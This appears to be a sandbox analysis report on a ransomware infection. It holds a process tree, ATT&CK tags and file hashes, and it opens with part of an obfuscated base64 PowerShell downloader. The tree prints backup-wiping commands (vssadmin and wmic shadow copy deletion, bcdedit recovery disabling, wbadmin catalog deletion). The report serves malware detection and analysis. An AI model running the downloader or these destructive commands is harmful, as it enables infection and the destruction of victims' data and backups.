CgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcAB
gAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==2⤵
    - Blacklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
  Command line: C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\ssd\onset\goodram.vbs"
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\ssd\onset\81ldp.bat" "
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\ssd\onset\15sp.exe
        Command line: "15sp.exe" e -psion0811 01s.rar
        - Executes dropped EXE
      [depth 4] C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 5
        - Delays execution with timeout.exe
      [depth 4] C:\Windows\SysWOW64\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\ssd\onset\Ztestram.vbs"
        - Suspicious use of WriteProcessMemory
        [depth 5] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\ssd\onset\sata1.bat" "
          - Suspicious use of WriteProcessMemory
          [depth 6] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib +s +h "C:\ssd\"
            - Views/modifies file attributes
          [depth 6] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout 2
            - Delays execution with timeout.exe
          [depth 6] C:\ssd\onset\mesager43.exe
            Command line: mesager43.exe /start
            - Executes dropped EXE
            - Adds Run key to start application
            - Modifies system certificate store
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            [depth 7] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
              Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
              - Executes dropped EXE
              - Enumerates connected drives
              - Suspicious use of WriteProcessMemory
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                [depth 9] C:\Windows\SysWOW64\Wbem\WMIC.exe
                  Command line: wmic shadowcopy delete
                  - Suspicious use of AdjustPrivilegeToken
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                [depth 9] C:\Windows\SysWOW64\vssadmin.exe
                  Command line: vssadmin delete shadows /all /quiet
                  - Interacts with shadow copies
              [depth 8] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                [depth 9] C:\Windows\SysWOW64\Wbem\WMIC.exe
                  Command line: wmic shadowcopy delete
                  - Suspicious use of AdjustPrivilegeToken
                [depth 9] C:\Windows\SysWOW64\vssadmin.exe
                  Command line: vssadmin delete shadows /all /quiet
                  - Interacts with shadow copies
              [depth 8] C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
                - Executes dropped EXE
                - Modifies extensions of user files
                - Drops file in Program Files directory
              [depth 8] C:\Windows\SysWOW64\notepad.exe
                Command line: notepad.exe
            [depth 7] C:\Windows\SysWOW64\notepad.exe
              Command line: notepad.exe
          [depth 6] C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /f /im 15sp.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
          [depth 6] C:\Windows\SysWOW64\taskkill.exe
            Command line: taskkill /f /im 15sp.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
          [depth 6] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib -s -h "C:\ssd\onset\mesager43.exe"
            - Views/modifies file attributes
          [depth 6] C:\Windows\SysWOW64\timeout.exe
            Command line: timeout 4
            - Delays execution with timeout.exe
      [depth 4] C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 4
        - Delays execution with timeout.exe

[depth 1] C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
- Hidden Files and Directories (2)
- Registry Run Keys / Startup Folder (1)
- Modify Existing Service (1)
Defense Evasion
- File Deletion (2)
- Hidden Files and Directories (2)
- Modify Registry (3)
- Install Root Certificate (1)
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5 9d538c0560b32800760c81848d63c768
SHA1 0347de3203f816ec681476bad1ba61a9d617933d
SHA256 ff250295947988215771c7277792f7678cbb6c8d0db006a034622ae50090cc07
SHA512 14e728259be57440bf8b497884cb376c2f1b7bde2b9c8ffc3c9f3804dbe59f12899a57e434b2f8b3ca03a215eda40c434eec21064b93bdbbc75c4951ec7b3c45
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5 61faf9608aef25c78ecec385617c1fe5
SHA1 475cb92095f1ee2c19a6eaa4615697b1b9f0c21e
SHA256 efa2e7c480e2cdeb6834fd1afca56ceb66f814e2b8da59ba6df4569d2b397ef4
SHA512 1b9226545cc39585a4a18b52227cdd7e6b8ff889dd40e9e186cce8d52c10abe1686fd8c799f52656f8b33ba47fa809d0f8369b1ef28207ebcc0d23e26a1d13dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5 f3b3ba3b8527743bfe3ae7feb9de6a4d
SHA1 65a5fc2851514d5867a6726768f03d956142185e
SHA256 49a00de339c432d57e5ec170f091b5995fa8bc4eb4121344642d25d22408b0aa
SHA512 961f899691646528b86bdea736ed59e7ea78137c2346b709aa0e98ed6ffad1466678efbccfc210be448634f979f5e97bde90cada0cf43f98f27c2afbd19562f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5 97aee21a264467afbb7689e071b59ee8
SHA1 b85ddf527a08f4d1e1b54d487634ab098251c3ba
SHA256 56a885f72f37f78f7cd7a17e0cb4134a6a8e525802f6dd5e5e90da62b29afa9c
SHA512 74fba666a92dae64c3689b58703538b66c3f26e4876eac2d1c07c5a14464080daf3aa04736ac01d5e409d6b38df3e6f22b9fad2a122788363dc4b4e0b5228adc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5 50ba128e73fa3632fb3a9ce015a4a69a
SHA1 ce5de7000ad0269e51f3521ebe31479d0f34b6b9
SHA256 38433e49bd38eb532d3e7ceebf33e2241973c4bd3e76c0c4a7766ba162978fbe
SHA512 431fe1336876303fd0a544b0a4853094c7d93a1e6972644415c3ecaed79c18891ca2db3505d38e40a63727af3bd89ecea72060b66c73fa63cfd9f3ac4a92b99b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5 1a538376e85ba3f8ff328899927e88e6
SHA1 81d8e40e928b7486ba2c9dbad370adda14516071
SHA256 c0e53cadf01dd9de13fb097add11195a6a749328a38b38a232e8ba25e354063c
SHA512 c183aed57055910fe98d5fdec18014653ba573b95c6adb7f93828df161f6a0f3eeafc91f04fb23ec1cd2deb23c3e90bf102e1ad141c043172c8c3c0c1b40cb94
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RW8YYLAG\PLHQGUW3.htm
MD5 b1cd7c031debba3a5c77b39b6791c1a7
SHA1 e5d91e14e9c685b06f00e550d9e189deb2075f76
SHA256 57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa
SHA512 d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UOAPEAJQ\EMT3TUFN.htm
MD5 8615e70875c2cc0b9db16027b9adf11d
SHA1 4ed62cf405311c0ff562a3c59334a15ddc4f1bf9
SHA256 da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d
SHA512 cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73
-
C:\Users\Admin\AppData\Local\Temp\~temp001.bat
MD5 ef572e2c7b1bbd57654b36e8dcfdc37a
SHA1 b84c4db6d0dfd415c289d0c8ae099aea4001e3b7
SHA256 e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64
SHA512 b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
MD5 3163bba8a4861d47aafa1667d3082fee
SHA1 32824014c8740b8fef306e742c891bec0ef068d3
SHA256 39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e
SHA512 e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450
-
C:\Users\Admin\Desktop\AddResolve.001.2BE-C57-121
MD5 97f8e83c3e8c3337861cead2eb037c97
SHA1 af09e502f0d07e3e8ba70b120d135f4ed55ee05a
SHA256 dae719ede20c150373ee4986e79c2f447e4c6314d4157dd2204f5edc6d3e5580
SHA512 356e5cd8bd048070ddc6a7a42a5c1f91a891b8231b163399aaca94b0281a8c8a2cc24b39ef477b94acb9c58173d8f76f4dbdec9946ccbb55ce5d71a375f38d21
-
C:\Users\Admin\Desktop\AssertUnprotect.3gp.2BE-C57-121
MD5 97dab8e7f59fa42399ee4a0df05fb33e
SHA1 6b866fae1b8c84627005221ab1648354588adb3c
SHA256 2fed5e3d6e91f834fcf82ff1ca183646dfd4ff3e8bff6349f63a0de882ebe285
SHA512 dc58830a152b0540189c434cb928f957baca4d74efe36a1adbe4828ace7dd44472e692920d4604caa141fbb6cf5263d0dba427dd23afc4a52aa2c807dcd079c1
-
C:\Users\Admin\Desktop\BackupShow.M2T.2BE-C57-121
MD5 35a1b943e945e2522ccd453aab6a385f
SHA1 4ddb3e20147f4c48537fb8577e148863c31e89f2
SHA256 880bcdda59fefe5c6feedfc75944226e81483fa0de714ce9b38c599c6040c0fa
SHA512 71cfa858c13b57c439c6856e917f8e7b62f03bbe373d6360eeebc7db09d8086158b0e728d9b8dadc8f64ede84fbf60113d0bf9a2e852c1f2a113a8a7734bcf6b
-
C:\Users\Admin\Desktop\BlockCompress.temp.2BE-C57-121
MD5 3d183530a3323f67e9a69c65563d960e
SHA1 c4db1ed4de316279dbf6d371f34af2f245fa64fa
SHA256 ada37b653ccd157dcd2ebe8cfb0cd74ee665ac78fe05b7686f6cbf6015f10241
SHA512 b4ee5ea9049247d312a62babd01f286ea6fd316a1c1666e2ae9d1eec750eb2ecce9d53840b90a802627a2d5fd570e289fb8abcc6d7e7be957c3c5fd71315bd1d
-
C:\Users\Admin\Desktop\ClearPing.dwfx.2BE-C57-121
MD5 e5851aea9ac500e646c024d3f1a2500f
SHA1 a188b9f05bf19bca6a49f379468e2ed421297547
SHA256 91dd85e89334393fbd863633ab895bbcc02b28a9ac0059aef6a0c8e8e2a9fdc6
SHA512 a0655d1dccf383dcec6596355fe2fcd9e2aed89b070e490ea3343b9d4d1fc63a48447a915e0de884f1dfb6e3182faa2b149c734e21f9efcbe692123ed4b24847
-
C:\Users\Admin\Desktop\ClearStop.m3u.2BE-C57-121
MD5 d71d556d8e8259899bb737f12d529fa6
SHA1 ba35a9232cdd743ec295a928ae3c36318795c4f0
SHA256 0faa9da2e7ddc0e3c7602df8bf04a3e18627bfebc1e4071573eaa6a04d6aed85
SHA512 2bbd2093b0bafdb85c65f220ac3b4a57d83ba04911041c8b602f95542f55a15b5abb6092faae188a1aa7391b06ed2eadde23c18051843b8967ff73048bafe112
-
C:\Users\Admin\Desktop\ConvertFromSubmit.mpg.2BE-C57-121
MD5 45dc3f7db0e80a7be104ad4fae3c578b
SHA1 70514b34e9bc083b9ca8bdc1bbee2746e9edf5a4
SHA256 109df0b507235f0c41f5ea3f151d806599678dba4e8f5d91d24f094ca73bde77
SHA512 93e58a3f734d87dd57751a2a9bd84599dda554b8ebaec7b15bfc49984dd5ee32087fc24ae8cff0b84b9da6376cd9fc1bc88c82869f352a7a1df32b27fe476d93
-
C:\Users\Admin\Desktop\CopyConnect.bin.2BE-C57-121
MD5 bd63842c738b77bf14d8322522bcc537
SHA1 3f6453756f893a97bd749eddceb5643855494d8e
SHA256 b8f1be85ffd126d1277b04a92858bf1e100e7e14a754cc5367b6f736e9e0381a
SHA512 945fb9dfdf25deb3de1355122859a9653931971affdd9e2ace04f5206d870400b1d53b649385cef040a8232ea0d1a7528b356b8635dd159bf65852d5f910fe20
-
C:\Users\Admin\Desktop\DenyConvertFrom.mp4v.2BE-C57-121
MD5 e4d069954803eb1d34a673f2b7c38d13
SHA1 42662f010b8d3bd8ad739c81c2a26c1d67bcc2c0
SHA256 3624e7cb6d0856d6ac0097ba821703e1d3660f7b3379df3fe8c6102a5c302862
SHA512 9294165c63f5a9d434da5bfdf8615d0d5ae8f2440fd357362a35da3215fb283ce1ba7d6c12f77a2c4647a871d4b4be3835e19622d075fc1eb30a65d373e7e699
-
C:\Users\Admin\Desktop\DenyStart.mpe.2BE-C57-121
MD5 42f0ce2f3e94a4e657dce2bc4fc91bdf
SHA1 532393a361eb4ff44808e029a095f2d40d01a462
SHA256 757074d4b17bbf32d0db92caaddcb82016b30be3202762b0fc5fb1a342f3e8cc
SHA512 f0c017b5fe491d089046cc6a54fea3cbe5f83e17b749b5cba0955c4b73e9466bde86e641f8db68f15f1cf5b89b632b58e26657127b0a27eca316b61247480620
-
C:\Users\Admin\Desktop\InstallPublish.WTV.2BE-C57-121
MD5 8bfba8314ebee23aae06a9c70b77a8dc
SHA1 28206962fb50f5e78c18af997a11f14b51f50269
SHA256 295f4e404ecd0546197f3f7e2a43a11116e5e56c151fd996d41c634141e6cd5c
SHA512 6b76cdd507a7bdddb2a31596b5522fb407f3e661307447e3cf6624cc6352053b116987b2cf300a98e65825157ded7420ec76c5ff8e1480aad5d8fe2c657b345d
-
C:\Users\Admin\Desktop\LockUse.3gp2.2BE-C57-121
MD5 2df4b98e51c40a352e674176c1721e26
SHA1 7ee5d3a1534815f8fbc92950ef5e9807dff00a07
SHA256 cb253c91755023a3690bc4310a0c76a4f5cc2e82cde3507e70724718f4014ec1
SHA512 eeda641e15419f304241c16e54cae459c25871a7691f7167b39fe03ad5ee4f26c9d88d004bded44f73a511111e1faed521721afc830ec1f36edc4738f7c62eff
-
C:\Users\Admin\Desktop\OptimizeApprove.ex_.2BE-C57-121
MD5 de392cf62a6e91da91dc06d9bdb30b62
SHA1 f0cacf9ecaf7be7fe6d4dccab784f9ab7fcbd933
SHA256 0f2c9b5bf25cacc51c5b8996069e56ba3de4fedc41977a463f8f08b4042858ff
SHA512 6199532695cd2a2e6ca497b2ed8ffe7169b7a1427fa24e3bcebf166a132bb57df0eda63101233ddef996a87ec8c3245d99ee6072a10ab7d3be09bd426780c4fd
-
C:\Users\Admin\Desktop\OutSplit.xht.2BE-C57-121
MD5 69d11a9c6ab0d0a814f0504ef02af3c2
SHA1 5c6f3e0873ec555444088c5c84fed8545dd622b8
SHA256 77b1a4993a158e5b41c8be11032346a6105d0cdde8b7d3268b705f427c09051f
SHA512 6a084ac7e48fcb13a200e4ab3b7438aa39129c06a6eecc7281f5efe59b69e8ec9a288d51476727d1938d4106179a712c00532b7d06ad7c4650e29145a73a682e
-
C:\Users\Admin\Desktop\PublishJoin.xls.2BE-C57-121
MD5 af18ad45c5a2ee909fe7979c57780b44
SHA1 3756e4fecce828c64458c719f902f3c7fc3a475b
SHA256 15022054f40c075d44ddd64c772da514ea1e43c35c3adf2af3997120fc7b6690
SHA512 65a83941714df3b88d33185292a6bb34240024e99235562d850bac19a52ef74f08db538593b8ce0ae16fdeae22a290d1cb2772c92a1a232f8d2fa4a4a4dce659
-
C:\Users\Admin\Desktop\RevokeJoin.ini.2BE-C57-121
MD5 b206498f5cec574bccca01f4d5c8f4f0
SHA1 44752cfb90398d2952f47dab578ed83af3c2612b
SHA256 2f9dd34b64f405c3aec6205fd838e62328eb1bb78d8699a081f42bbbf75a8d4d
SHA512 4c3a238cc3c6215cbd1767a701b036e1f1efc174c15653f6a65c9f1ede7cee9ec945e1d33ae3aa71928efd98f70d3f00cbebecbfa685be8666e7bc9973731dc8
-
C:\Users\Admin\Desktop\SearchStep.mov.2BE-C57-121
MD5 1fc7061c3f43717ecbfbb2cb882e000a
SHA1 dcee4c3e232ab9c6d8c251a96ce94c10055c70bd
SHA256 38ed4b2d814f44d9ba0e113f514d8aaac2aab35c194d9261e7330b025f2843b4
SHA512 da972881dabe81e6cfc75293479983717a32ce1c1f7d2ce60498e9e9808797f6bdf687b3a7860f728d9270c0bc16eadd2a55a02ddf05a636f75a5b02d753767a
-
C:\Users\Admin\Desktop\StopExit.vstm.2BE-C57-121
MD5 44d9e3d62861697bd812114606da2558
SHA1 9a009324b4792e9192155b77b9e24c0e6c9df574
SHA256 e98840f1647c9162557ec013dd90772eceecd92a3e4cebdd89a6a2f9061bf3fc
SHA512 36778204eb6c1cb187d7222ab406aea24df4d19c64ce09ef3bfdbe21c4272575c6270baf6912b8e96ad6c6012da7d0375018a34a6ec327f525e90d4140df84cd
-
C:\Users\Admin\Desktop\SwitchBlock.MOD.2BE-C57-121
MD5 86cb72e3478159d92112d945be60c02a
SHA1 2b86358b160548fd28a45e13f9acabe66a682321
SHA256 222aa65897e5fca854cc621af5d83d34b5550ededf1bfa1c169634be2e5c638a
SHA512 ad984d99401800a22badc0c2699d8122b765028f796036edcc5f1795f0e7dda1ae6ca0667a062713121da73d86729dddb689179de500b2a58ee4c9e6b5a42756
-
C:\Users\Admin\Desktop\UnblockExport.txt.2BE-C57-121
MD5 e513b36b03bb31dea098190e1163cf95
SHA1 f44fdb3a89eb90939e5fc0c51b50d77db9685287
SHA256 1cabfed26ed82fda53b860719ee8c3d85fc14aa9a17151ac83310242d16365af
SHA512 c2b99e580571dd651b66483665302e7b73d5357b2d9a9b5ebd1e7cff21ead3f798e5eadceb4183d0bf944a2f5c69ba7fc02e4aac6c5de23558cf74677132b474
-
C:\Users\Admin\Desktop\UndoPop.odt.2BE-C57-121
MD5 98c22e5affd882fce73b047327a52f03
SHA1 3de097698312466cb69e3938e32b6ddff77c3d97
SHA256 951bc1fadcf1823d2df6b3b6de7851cfb0fd11ebb4bb5cdd63a619ac3a683777
SHA512 7df34caa7e1e4ab6ccc79b0a0ea6ed2072647835216b48cfc93701563b74af3b603b3591df7a06691ea133fccfde4bf783276d27e18532bdbfe00a4a4abadd50
-
C:\Users\Admin\Desktop\UnlockMount.wm.2BE-C57-121
MD5 3fabe940d1f6233bde3bd0c3f8c54bed
SHA1 e941808e5bb0e1893ab2fb9f010f1afae908f2e7
SHA256 2f01d21cb9786624d38d0a1117ba62b876432150e41969485316a16d69b03b9b
SHA512 63fb567b8143bfb222defd69ec3424b8f016046915462872a61e201dd01b657566478548d3e2f1ac8ea4f830edd712fa3d838ea1a158b87f7873960801768bd7
-
C:\Users\Admin\Desktop\UnregisterOpen.raw.2BE-C57-121
MD5 97fc0699bd54aff46e3826e523971242
SHA1 0ede82f69cc8ed93d6891d7b572258fb7952c734
SHA256 985d3642a25fe1e0c3485d0c0cc9643c63b836fe860f22ea9e125546f6dfb14f
SHA512 e78cf2035419bcbb96b39b38ae2a1c3a7e61a290db56a2ba9573fa50b931af12f7a26433871c1c3e59728ebb991f588db4bd373dc59568f8837a8a13ce1147dc
-
C:\Users\Admin\Desktop\WaitResolve.xlsb.2BE-C57-121
MD5 ff68631b44a1520ac1c6f69b331509d7
SHA1 603bcb5b47d8a6e2c16ff5dbd685a5c6ffeaca8a
SHA256 d50b440aed284a8df30f7aa99c97797418a958f329a02b7e4741761eaaccfb80
SHA512 d120739581a0f9d10b8a8ce67a3a68d6dc1a42f241fe9e4ba76573ef89f2e0f499e2b645f80b47746e447bbf03376a4013329099f8e8f6f33f8f311aa386e77b
-
C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
MD5 d18bf81dbc8acce488abd633d8058cf5
SHA1 1d6dcade355b4867e9435961655a9b9caa373528
SHA256 4e0d1edb76747fd945b87dd18299298f0df719edbea946119d91db59a9b6527a
SHA512 10a6b3994b1b0d37c9f3833e700baded6b89b0162078442b4de5a9747c23027d8943016c5941ba2e530ee5263b87c31a7714aa7bcb5051e5d63cf0a3cd88756f
-
C:\ssd\onset\15sp.exe
MD5 061f64173293969577916832be29b90d
SHA1 b05b80385de20463a80b6c9c39bd1d53123aab9b
SHA256 34dfe4869b0a524c63cc4696fafe30c83a22dc5fe4b994b9fe777f2c986733ce
SHA512 66e284f7c7e40af988ab09ff48cc786d287ac906368042d98d313be764058f01ecb5c3a7ab8d4336ee6494ea4a1347e73f0f2b4f3baec25ca6bcec1d888bd3da
-
C:\ssd\onset\58nfs.ini
MD5 42f9b29cb18cec22cf1f68375685ddc2
SHA1 54de5fd042aa740be90f85d7887d41ebc0e00b4b
SHA256 7aac762ca37c72400df369c6a25d81e758071e570f8dd68f136290923165d007
SHA512 f4065bc2b1b5ef8577c22ee6fe3ee4e5ee9af413d7a693940e317d2ab23de4ac64079761469369b282665c5d19fd3beb9a9ecd0af64a40531df946c65f36ab5c
-
C:\ssd\onset\81ldp.bat
MD5 a5464805722aa29200eb97cb26605135
SHA1 80b2c57e6475325a89eaaba24db02685830018ea
SHA256 03130577ed6032ec6fce61f3f4a52fbfd2e7eb69ca1901823682b392f89c0e8a
SHA512 d99760c1a82e2bd46d4d400c60c2c7a1fdfa057b84c6de2e992e19c662f62aed357e67c6f326e989124ccf7b67b57e1157b124e9bee4765e4f6730fb57660aae
-
C:\ssd\onset\Ztestram.vbs
MD5 b835e273fb843348db5f05d2ed0958e8
SHA1 8a5feab98df1ef7a898863e941e8bb07d007b9c1
SHA256 066327629f90b617ff1980f80a69ff3f5d76b4b005bfe9ee1a52319bc5517c94
SHA512 5438cd64586b1bfb6b555b9183e50cfae143306b163d7b4810383198cb8afcee3b5631a4f7cfb65561c2bb9babfaf70e8403937ae8d80cae93e9cd57e5c8331e
-
C:\ssd\onset\goodram.vbs
MD5 1ed7cb327b190a41ed8aee89c9be87d1
SHA1 6bd8634e530a6911501f1ab1c23fa4282d3a9e4f
SHA256 c31b950a44c81e1aaa37c495da1cf671ef730a5d1efbf5e68a875bf998c94663
SHA512 a9b85159614d71f91f05d9f1a4f65085105591ef7ca6d4094e171121e4259ebeca65fe490c28846b8d5791ef15cd7c01d56c7114aab517bab64c2f262c3dfb7c
-
C:\ssd\onset\mesager43.exe
MD5 3163bba8a4861d47aafa1667d3082fee
SHA1 32824014c8740b8fef306e742c891bec0ef068d3
SHA256 39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e
SHA512 e25f77dd78df4a80ec02f01c8c6ed85fa0f9028ea87b899ffa0a5a87d211cb8c861d4e7912bb8d3cc3ee0a7240eb130f0abd6ffa0d3698b3d416c70de52eb450
-
C:\ssd\onset\sata1.bat
MD5 03560667f8a4144f8d45f917fd522a95
SHA1 df8ec645f2cbecb9388c87a63674b508a791433e
SHA256 41e9529c2acd43b7a206ec80655016bb65ba6721acfd930d351399730e809ad1
SHA512 215824afaaf96acef5977a7e6f48b2133cd969b1d809db333bf1b700176dfaa745141aade50fb4bec1151087a3deb2d64ae542b2405a17ec53d17fbc69052ad4
-
memory/644-6-0x000001C553427000-0x000001C553429000-memory.dmp
Filesize 8KB
-
memory/644-0-0x000001C552880000-0x000001C552EB7000-memory.dmp
Filesize 6.2MB
-
memory/644-3-0x000001C553429000-0x000001C55342C000-memory.dmp
Filesize 12KB
-
memory/644-4-0x000001C553426000-0x000001C553427000-memory.dmp
Filesize 4KB
-
memory/644-5-0x000001C553427000-0x000001C553429000-memory.dmp
Filesize 8KB
-
memory/980-19-0x0000000000000000-mapping.dmp
-
memory/984-61-0x0000000000000000-mapping.dmp
-
memory/1168-23-0x0000000000000000-mapping.dmp
-
memory/1620-58-0x0000000000000000-mapping.dmp
-
memory/1748-53-0x0000000000000000-mapping.dmp
-
memory/1796-56-0x0000000000000000-mapping.dmp
-
memory/2092-17-0x0000000000000000-mapping.dmp
-
memory/2172-47-0x0000000000000000-mapping.dmp
-
memory/2304-51-0x0000000000000000-mapping.dmp
-
memory/2496-62-0x0000000000000000-mapping.dmp
-
memory/2532-26-0x0000000000000000-mapping.dmp
-
memory/2716-7-0x0000000000000000-mapping.dmp
-
memory/2740-60-0x0000000000000000-mapping.dmp
-
memory/2748-54-0x0000000000000000-mapping.dmp
-
memory/2880-24-0x0000000000000000-mapping.dmp
-
